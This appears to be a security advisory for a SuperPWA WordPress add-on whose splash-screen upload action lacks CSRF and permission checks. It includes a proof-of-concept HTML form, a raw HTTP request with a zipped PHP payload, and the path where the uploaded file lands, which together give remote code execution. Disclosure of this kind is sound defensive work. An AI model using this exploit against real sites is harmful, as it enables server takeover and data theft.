When the Apple Touch Icons & Splash Screen add-on is active, its superpwa_splashscreen_uploader AJAX action, does not properly check for CSRF, authorisation and the content of the uploaded archive file. This allows attackers to upload an archive with a PHP file, leading to RCE by either using a low privilege account (subscriber+) or a CSRF attack on any logged in user. v2.1.11 fixed the CSRF check, only. v2.1.12 added capability check.
Login to the blog as a low privilege user (such as subscriber), save the code below in an HTML file (and replace the example.com by the correct domain), then open it in the same browser used to log on to the blog and select an archive of a PHP file <html> <body> <form method="POST" enctype="multipart/form-data" action="https://example.com/wp-admin/admin-ajax.php"> <input type="hidden" name="action" value="superpwa_splashscreen_uploader"/> Zipped PHP File <input type="file" name="file"/><br/><br/> <input type="submit" value="Upload"/> </form> </body> POST /wp-admin/admin-ajax.php HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------42382098251599243971534803211 Content-Length: 595 Connection: close Cookie: [low privilege cookies] Upgrade-Insecure-Requests: 1 -----------------------------42382098251599243971534803211 Content-Disposition: form-data; name="action" superpwa_splashscreen_uploader -----------------------------42382098251599243971534803211 Content-Disposition: form-data; name="file"; filename="134.zip" Content-Type: application/zip PK���IE������������ �134-zipped.phpUT �ô¤6TlMÖ]�)p`ux�õ�����³±/È(PHMÎÈWPwsôôquQ·V°·ã�PK^Ý}u������PK���IE^Ý}u������� ���������ÿ����134-zipped.phpUT �ô¤6TlMÖ]�)p`ux�õ�����PK������\���v����� -----------------------------42382098251599243971534803211-- PHP will be at https://example.com/wp-content/uploads/superpwa-splashIcons/134-zipped.php
UPLOAD
2021-06-29 (about 1 years ago)
2021-06-29 (about 1 years ago)
2021-06-29 (about 1 years ago)